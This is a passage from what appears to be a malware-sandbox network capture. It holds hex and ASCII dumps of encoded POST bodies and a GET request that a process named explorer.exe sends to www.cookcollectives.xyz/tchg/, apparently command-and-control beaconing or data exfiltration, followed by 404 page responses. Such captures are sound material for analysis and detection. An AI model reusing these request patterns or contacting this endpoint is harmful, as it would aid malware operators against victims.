44 41 67 32 50 63 6e 65 39 75 66 6c 74 72 53 7e 35 63 6e 38 46 36 70 56 4d 73 43 52 47 35 33 44 32 6d 65 31 38 39 43 79 7a 50 59 75 46 37 67 28 37 44 35 5a 35 7a 37 39 2d 4d 77 6f 52 72 68 63 7a 4a 6c 28 53 7a 64 47 55 46 49 6c 48 50 52 72 65 4f 34 34 41 73 6f 61 4b 6b 6f 56 45 65 71 49 62 59 2d 31 30 56 66 59 4b 61 72 58 34 53 6b 42 31 4f 57 6a 46 41 50 36 55 53 71 46 37 47 6d 33 48 7a 44 52 4a 36 4a 31 58 4d 76 4d 56 7e 73 7e 4c 7e 55 75 62 75 65 4e 38 41 44 76 34 46 55 6d 4a 31 75 6f 56 73 72 77 31 6f 52 6c 6b 4a 5a 75 4d 51 39 55 45 44 53 70 4a 34 66 79 5a 42 46 75 58 34 47 59 62 75 37 72 52 6b 43 35 6e 66 67 28 65 4f 41 36 75 65 75 7e 6a 4b 79 62 65 4a 45 74 70 45 58 70 58 76 68 63 69 4b 6a 50 6b 5a 55 4d 4c 6e 61 6c 4d 79 6d 62 7a 63 4c 6b 55 59 70 4d 4d 74 75 61 31 32 68 5a 33 32 69 61 33 76 4d 44 35 63 34 4a 61 43 45 75 33 47 42 6a 47 6a 4c 56 75 6e 39 45 41 59 6b 6a 38 6c 39 76 44 4a 36 6f 4d 4d 76 52 62 4c 62 76 54 76 38 35 33 31 77 69 68 4b 71 4b 51 61 59 57 67 76 67 49 42 42 62 42 45 6a 67 7e 4d 65 7a 44 58 4d 55 6b 39 28 59 50 61 71 44 50 33 66 32 57 31 45 6c 44 42 34 4f 6e 62 33 67 44 57 67 52 4e 74 78 59 30 67 67 4d 50 76 7e 63 33 61 4a 41 31 6a 48 68 7e 57 69 33 50 67 4f 72 41 56 67 4b 66 54 53 31 41 49 4c 48 50 35 44 6a 56 6c 6e 6b 36 4b 49 36 4f 68 33 75 6f 69 44 59 42 5f 78 54 73 6a 4f 79 4c 48 63 50 28 34 4a 35 38 31 6d 38 48 64 69 35 52 48 6b 53 73 4f 51 75 57 63 38 5a 69 74 51 36 56 43 4c 61 54 4f 75 38 33 42 6b 62 73 53 61 50 42 5f 34 75 43 43 31 43 4b
                                                                                                                    Data Ascii: O0qEM=y0LygpetLNLbI8Qx2hWNCienVZCRY2cEv45QlYL2TIaKLmonx6BhVYeiy7p9MvFy7haCFlr5vi5woSrh8Z3ND-6DnPDwOR(Su-jawaYtBBU-Eewi0AzMd8V53a50i9omwHJaa1jyk_VXeFRzYYW-7mdeY3FlDBbBioTrAGcZWwKF~5w6VMqVjMl5IjXWNbhqTLvrLozw3qJ3MZZnjy0s3ukTlUnpI9ZczIlwvBiOygHxt57HFoN1WsxYvEMT(1IiWr23kZ8t6nhK0Eg1abKC(pscg85l~CqkDiDNb_97Hp7JXS6mg-VaAXTs0z8i8tMsVhRx(BO2isauS6FWZwED5qIuN0vVxKFDVfCeoAUNLOws8hkwGjq5Gceg66(JIk5fL4IxjYOLV67M(LQONOvtTZHW30425I34tzO-m0Z47H~e4NtfhA0YGj5yQxpjAb52(a9q0pbbiE5cYwOcTPuSBcWahtNaHF9rs7vaPTjg(oQqPicgPmTdIMkcpfR78fOSluI9jgcS1FoCoXXfBVKcn3uEZr1OPO1gCG47ECnCevoSUj0Ze_3VaWApXGe54nzvvzPP(UKK7gNV0Yn605wQojY8dnbqin2GYA6FArJtGBmFJIe3Koq-oT0BRMQpNocmoXFdzWB7sL15hHiQUyRnLBtW8SFigWQHx-R16U~Mo2kVimitTxIaZMvigh619H43cNy4lup14p(wk1JzEzHb245QPGk85z~6pjaZTXaytv8A(58Z5DbBeoQ_NT5wwDr0KLX_YxDx5D3yjl(U~TGk6vihL9900cHkWVfTyL83oR2Xp1qeCt0AfI05eP8tsKEpk91ratAdmIkU8lXwZM62SKFljDAg2Pcne9ufltrS~5cn8F6pVMsCRG53D2me189CyzPYuF7g(7D5Z5z79-MwoRrhczJl(SzdGUFIlHPRreO44AsoaKkoVEeqIbY-10VfYKarX4SkB1OWjFAP6USqF7Gm3HzDRJ6J1XMvMV~s~L~UubueN8ADv4FUmJ1uoVsrw1oRlkJZuMQ9UEDSpJ4fyZBFuX4GYbu7rRkC5nfg(eOA6ueu~jKybeJEtpEXpXvhciKjPkZUMLnalMymbzcLkUYpMMtua12hZ32ia3vMD5c4JaCEu3GBjGjLVun9EAYkj8l9vDJ6oMMvRbLbvTv8531wihKqKQaYWgvgIBBbBEjg~MezDXMUk9(YPaqDP3f2W1ElDB4Onb3gDWgRNtxY0ggMPv~c3aJA1jHh~Wi3PgOrAVgKfTS1AILHP5DjVlnk6KI6Oh3uoiDYB_xTsjOyLHcP(4J581m8Hdi5RHkSsOQuWc8ZitQ6VCLaTOu83BkbsSaPB_4uCC1CKEFCCp3qGRGZpK(U9UTb~iIkQM8ZLnprhaCcTcqb9IPWTRupEg2AhpZaKVUYSOnJkJ1qGemxKRtqXpxo2yn_lLthG4JIJqjQna0_8p9iWvrfVEIIb-QYSV77wOGsYYLMifkiL-qBeXk8HNHic6wrOWy581hC60mfvBKwZEPo7t6u(xcytx1zxV63tBjYiNcV6xa63OMo(ek_gB4ASFcetXf60cz-U_wX6UYfDzFndJFzuPVTYLvaO1tGZale2q0BwoOZNsXg6v~Nh3ZyJOWvhkIW(eyU80A2rnjUVNoYiUacSfXH4N5Z04cU5OxZyCkGbEuNcZm1i4t41lvek1RgHQaqokC69fmrXX6RAPSrst44q1YDudwQ05crNrcSlk1em5pLBNiOYOK9jhzam2CYRkP6MI9IO55O9Cn_hcd4TL91eHFO2aZsf_8fLkLxNmEfVTmPhdRnLjZdtjHg14VVN7d-dJq1sNMwM0CaZsUhNXENfStIf-WyBisPyCLJ87nTaHIlZSmIIrJZGPUSJruUBetJgMPt1eOZUVdA(aJ4nqv0KrzOjPG8NdQDUPXkNHvjcRfNIt9DNaV7iC9VZXltqnqMK5vO72Pje88y2-I2B9C54jNkyoE0CBmvQBnBHs7XzS9UGJrIoUwIQ_1NMpeNP-Ed6w7f(b7uUzM8sx6D3D4g7xlyJoDCg_5u1HZ3VfykGylaY0fptmPj8L0mFu1J7TOiPRQHfcwlC_1MahMSsl1e0HGUFJ(quAD7wVPE3xQzcVA1~Ttw1FQxZaYTZvWuujFihcclHiWkdHh9E2fxFdTksAPodjvrZqGNjKr4YS(kQeyT7H4YZqyNwVMJPcdotPaODRsMhKHLQyCGve(1zhSD5hZ9GNEj3CTsGPB5dpe4Vfef6cZdhQngYAmdcS7U0yZy3po0IXqUL5jpaDN_K3ZqrKuKi5ou6o7Z(02Ckr1KfIga5bJJEnZ-c8qY5375qHsasIMSV6A4vrD91BIQESb5Unsc2J4LG66OM68Tn56Z5JVx6KDoEHDY3YIhH4Jy2ubUbQ31lycHdIgoHrSu7SOibVGQqCDnz56dnc8LiiCoQdmJ8uOaD5VG4aUK3xwWIIxM~s4VOZuqJj7sqZ62M5J0LYPxbKBPyA3TRsAZYNeKvvJxXbPNw-7GFs07o9YAY3dH2xAOFUnCxkIKJujf~5JiDSFI1ilxNrVdoyrbuqWEDss5u33NK9SnHc2kD56w2HMMtdJ38lEXSSwkDgaVM3MpTBpJlH4wcH~4v7OrO0UEFPcZXTTUW-R58k4SigXNqv7Sp75ajBRGJaf9~MKMA_00TTqxreg0aBn5pKs2bBcjwykCqU9u18ZNHx~Aq-ff2ERkC0u93ZX9iaVPfEbo4yJmVwVZaaBwVitUG5z8AZQzly(lUXlFE_eb(OD_DMIdKkusynjmDYHjk6ppoAQmML5BfPx-NFyYBBCfY6XBUmTmtujZ1feDq2qyuMcxq3kAV9j_sTW36m3NVH1V(VCwotkDiGNn(hndwpKIvHhOPhtjDk~12_nS~FLxAdEpb3plQbFbxs7uz-qZ3DJ2wqZWvwusEZMD2zToDmg9hY8ITU8dcKJvnQ8UV7Fd7LWRDQNU4SFYWRkRmD2WjJyUH6MD~NCTLGBsMUrlHYgkyX6k5MJjj3ZzL-bacNLfHgB7SMVgENVJlI1BP3i9zTqygz1s7_fX2sG2f1Y25_j0fMUvRtHqpiy6ReYbogGXYPFf(mP_FIbbjh7MzqdEEY8IHLdT(0SpLOWFkpkmZ-1Wd6H3zgucwpbC8R(27vKoSGdi3uOPuNTqBC30H0wZ7xts1CNGBDFRtGGFNP8yqUEroOBYB9PhaCkmlaz8CWYkRp(OCcSZuAWRWJym95LXm_Okd9wuF7ZUj1u5L_Whh1~ZF9174ULVtTYwCDW8v1bxxKDxGy~LSL4Er1Ui9r1Kkpzf64Nu2woxHPvafIZX1Rzc6xgs7J7HWeZq0JWJFA9leHELTzGWc9QMEHD2iUR3dNg_BxuWW4dmnTPRvklbJouCLuhXk-qodl2LraFIDPzJJxPvSghoqdsLczD9nhy1L
                                                                                                                    May 30, 2023 11:08:54.303937912 CEST538OUTData Raw: 36 78 5a 4a 6d 66 4d 58 4f 32 6c 6f 6f 42 31 51 6f 39 43 41 64 4f 70 61 6b 77 61 43 30 43 63 72 78 39 7a 66 6c 52 57 4a 69 65 33 56 38 59 54 50 4e 45 76 48 59 28 64 44 4f 56 47 6a 43 58 2d 6a 35 72 54 63 30 4f 58 59 38 6c 5f 63 59 6a 36 48 6d 4a
                                                                                                                    Data Ascii: 6xZJmfMXO2looB1Qo9CAdOpakwaC0Ccrx9zflRWJie3V8YTPNEvHY(dDOVGjCX-j5rTc0OXY8l_cYj6HmJAfzVGZturZL1IlmBAnYwFd-K6fKrB~oXLz6didDqlXbTg8LfHhMy_Otl3GxbVHO29s9FawSc2VJBDkse4SyvJI3Rw5FYQSw2vCfzyORJPSvH_4gMXDkP5nt1bZF8AmLTLgHdj~aEBTt2f6x63uUnapIY99Q1AYYbN
                                                                                                                    May 30, 2023 11:08:54.473973036 CEST541OUTData Raw: 47 71 37 4f 68 4e 48 31 68 6a 39 6b 6f 58 56 49 66 50 51 41 2d 50 71 45 66 6a 78 58 54 4e 38 57 73 4e 56 7a 76 75 72 39 55 49 53 7e 2d 57 41 36 39 6e 78 6b 36 77 4d 61 6d 5a 59 6f 46 6f 35 4f 32 71 4c 75 61 47 72 42 32 47 34 43 38 63 45 59 74 69
                                                                                                                    Data Ascii: Gq7OhNH1hj9koXVIfPQA-PqEfjxXTN8WsNVzvur9UIS~-WA69nxk6wMamZYoFo5O2qLuaGrB2G4C8cEYtiuRMCHSSd0p_xYco0_Trv1vizmyB53Z7JS2OhgZkeKOOrKmxI-2OzNKavOljF-RHGc6AE30ComFWoC7MToVYVZxIL1KxddRLi6BaPzs72deoNBlPIKAf8yBfUeQQ9xB3q3gq2BaRxLlfXoekQTBNLkFThqX6SmpdwU
                                                                                                                    May 30, 2023 11:08:54.474148989 CEST544OUTData Raw: 31 45 41 6d 58 41 79 42 2d 46 42 4f 64 4c 54 31 73 37 54 39 6c 4d 53 4e 45 5a 67 47 4e 53 4a 34 75 56 62 78 4c 5a 75 55 53 77 75 54 65 52 5f 65 69 53 67 38 70 53 49 69 6a 6f 5f 51 59 53 53 6d 76 77 69 46 56 36 66 63 46 76 37 55 69 54 64 58 72 28
                                                                                                                    Data Ascii: 1EAmXAyB-FBOdLT1s7T9lMSNEZgGNSJ4uVbxLZuUSwuTeR_eiSg8pSIijo_QYSSmvwiFV6fcFv7UiTdXr(nd7bjccopDPXdrnc-knzPBV9DiEIY9sxbpkLezsNRuUQ_eL(7clUKS0rRMa39bKuE~dOvpoEREEhuEufMW8I0LiihMv8dhbAIEL(kjXVmJXmSkCjX89z_vMEdlVy_9nlluz09xGFz6UvcnFnu3S88FnkMW04nbfW7
                                                                                                                    May 30, 2023 11:08:54.474302053 CEST545OUTData Raw: 39 48 75 57 5f 38 5f 45 6d 41 57 74 41 74 31 4b 57 77 74 49 78 38 56 6e 4b 46 57 56 4c 75 2d 58 51 4e 47 55 51 79 5f 32 61 7a 48 71 6f 75 70 30 66 6b 63 4b 38 52 51 66 38 64 44 70 49 39 2d 71 41 62 32 36 63 6e 67 7a 30 59 4f 4f 7a 6c 4e 4a 41 76
                                                                                                                    Data Ascii: 9HuW_8_EmAWtAt1KWwtIx8VnKFWVLu-XQNGUQy_2azHqoup0fkcK8RQf8dDpI9-qAb26cngz0YOOzlNJAvuSTVhq4mZcU0SeSrGos9rnA4N1sl24xy4283QpsQbZHNBBBXCbsKNwdf2qGBGX4T-BN5m~7z9iTtb6xHERWQEk_vhbW53xeQa8V~ZSnzIC1oLVG8oUhjkCnxDNZ84NsTq3IhnfPw-cJblCRagXv7l~Ic9ukjgbnz-
                                                                                                                    May 30, 2023 11:08:54.474476099 CEST551OUTData Raw: 2d 70 6e 48 7a 4d 5f 7a 77 31 74 66 4e 33 53 6f 6f 64 44 49 55 7a 37 64 4b 55 6c 65 6b 64 4d 6d 58 78 50 68 7a 48 71 59 37 6b 64 6e 78 78 73 54 45 72 46 67 4b 6d 70 38 7a 4c 69 45 73 41 6a 45 71 38 63 28 54 36 35 66 30 6d 41 71 6c 34 43 52 50 4e
                                                                                                                    Data Ascii: -pnHzM_zw1tfN3SoodDIUz7dKUlekdMmXxPhzHqY7kdnxxsTErFgKmp8zLiEsAjEq8c(T65f0mAql4CRPNoWuquQbE9AIUtxGuSOYS80VyMeK6mCJ8FjrODVHNUdWu7~4MPBE~8Xz1CigROf6ifi3C_3IrxstRix6G9YfmlN3xdBuSBgv73nMRaWsYLdm8lYqUp84ji9McppZ96Xv2dXE6JEzs3(GBe4RQPXJmdlGXf3WTQNeTf
                                                                                                                    May 30, 2023 11:08:54.475366116 CEST555OUTData Raw: 52 58 77 50 55 31 43 56 6c 64 57 65 59 39 48 74 6c 4a 4d 5a 42 54 2d 51 46 79 54 34 4d 52 44 39 56 44 69 57 36 58 5a 39 72 75 53 6d 59 6e 38 4b 69 78 6e 6e 38 47 65 28 6e 44 6b 48 2d 58 42 57 53 69 50 66 6d 69 63 55 78 49 67 71 73 75 45 6b 57 45
                                                                                                                    Data Ascii: RXwPU1CVldWeY9HtlJMZBT-QFyT4MRD9VDiW6XZ9ruSmYn8Kixnn8Ge(nDkH-XBWSiPfmicUxIgqsuEkWEJWxMmtLQoIDks2CC1FZgbe8tMRALdvR~DWqYJY-NIbhMzfr4NPRSSzKDFR3LjgJJ9NHp70_weGVbLTvvkeoakLamWhJm6aQ03U89UCJhzZYarooQ_jM6Wq-p3N8lYr_5VQQRGia5umuA7HEwwzVfoasytoXY5s9mS
                                                                                                                    May 30, 2023 11:08:54.475539923 CEST564OUTData Raw: 6c 6f 52 42 78 74 72 6e 41 6f 68 50 51 30 48 58 4e 77 69 61 4b 7e 72 4b 78 44 54 57 4a 68 37 57 7a 78 4c 50 4f 6e 75 55 2d 71 30 7a 50 50 6b 66 50 76 46 4d 74 45 50 5a 64 72 78 43 4b 4a 43 76 30 6e 57 31 58 62 48 71 63 78 72 48 57 56 73 75 70 49
                                                                                                                    Data Ascii: loRBxtrnAohPQ0HXNwiaK~rKxDTWJh7WzxLPOnuU-q0zPPkfPvFMtEPZdrxCKJCv0nW1XbHqcxrHWVsupInsRtUDmThA9OzSMQ6l2r_o7AlbIePBUwqII1d9b2OgwkvZ9wA0BLy4E~eM4PT02CcFtjyT0~1q9wck2SefxX3x60Eqj057xdr55rPUKdp3nv3xxxx2r88k-3cfWhbj9Th3snczlVTNGeS3gfBnsiLyybFZDk0Km9S
                                                                                                                    May 30, 2023 11:08:54.643698931 CEST566OUTData Raw: 35 38 5f 77 38 4a 45 55 46 59 42 66 65 6f 6a 72 4b 4d 43 70 4f 5a 68 69 77 58 4e 4c 77 77 46 75 6a 31 31 43 31 67 4b 73 71 59 69 28 58 38 6a 36 79 43 4a 7a 39 51 4a 58 68 67 57 6f 48 39 78 56 6c 37 6f 42 48 4e 4b 70 71 64 68 32 57 79 61 36 63 79
                                                                                                                    Data Ascii: 58_w8JEUFYBfeojrKMCpOZhiwXNLwwFuj11C1gKsqYi(X8j6yCJz9QJXhgWoH9xVl7oBHNKpqdh2Wya6cyIaUeWFByVUCkBVY(K1NE6bVk-hYXLg9vCGU4EEp(dR6yqxo~Me0mcDwIcD1IKDGkxIuDUnO~Ggn~MBsa2gRwcggt8uAimeMc1D882VV~THKw6eNrG7A99Y-ONcZX0QuJFLWr48-ouuwqTRedyL52k~CD5PsLhKEjt
                                                                                                                    May 30, 2023 11:08:54.643904924 CEST575OUTData Raw: 33 52 37 6d 38 66 33 63 6f 6b 5a 62 79 35 56 71 59 52 50 33 66 39 36 58 6b 6f 66 6f 64 4e 36 37 75 79 2d 41 4f 28 75 28 52 78 4b 42 30 38 79 55 61 68 50 72 31 59 44 46 66 37 4f 75 48 62 59 6b 33 61 4a 56 46 72 65 42 4b 37 4b 52 79 6c 2d 7a 35 71
                                                                                                                    Data Ascii: 3R7m8f3cokZby5VqYRP3f96XkofodN67uy-AO(u(RxKB08yUahPr1YDFf7OuHbYk3aJVFreBK7KRyl-z5qRfO3GXMLCFV4Jixm6i5tJ~ej3JkzOGou7hoR0URFao439yv2-vPcZz975jO~SRF5EmzYPgs4X3R33l0JGje0M0IoNOa8B32s_lUBYeoTQSnPYo95cbowyOoQl(E4ezZdmsNAbh7nZqkfUNZNWx42ABoSb3W994a~9
                                                                                                                    May 30, 2023 11:08:54.644035101 CEST576OUTData Raw: 68 79 4a 57 33 78 6e 53 63 68 6e 6c 6f 47 75 4b 38 77 78 32 55 37 65 77 65 69 38 35 64 43 63 49 6e 64 4f 61 5f 35 56 69 44 73 47 69 77 67 44 58 73 50 54 33 69 79 39 78 50 4c 37 44 57 4d 68 67 47 51 7a 4d 75 41 45 6a 36 44 49 44 63 6e 44 49 74 75
                                                                                                                    Data Ascii: hyJW3xnSchnloGuK8wx2U7ewei85dCcIndOa_5ViDsGiwgDXsPT3iy9xPL7DWMhgGQzMuAEj6DIDcnDItupGkc9bXVaTswvutsQjwJKe2TkrdxJVH~1SlXZSbbsPGw7YE438qMpHpNORJx6Bp7n8PBaJ9ds5qCH(glQWL(oGUOVFm9g91UrBIOPN3dlC_jHCWsTr6Huwps48P1PWa5CkDQytjpAkNxRbARpEu7hDk~-(x3wluos
                                                                                                                    May 30, 2023 11:08:54.975713968 CEST580INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:08:54 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                                                    May 30, 2023 11:08:54.975758076 CEST581INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                    Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                                                    May 30, 2023 11:08:54.975794077 CEST582INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                    Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                                                    May 30, 2023 11:08:54.975822926 CEST583INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                                                    Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    18192.168.11.2049777199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:57.004575014 CEST584OUTGET /tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:08:57.291712046 CEST585INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:08:57 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 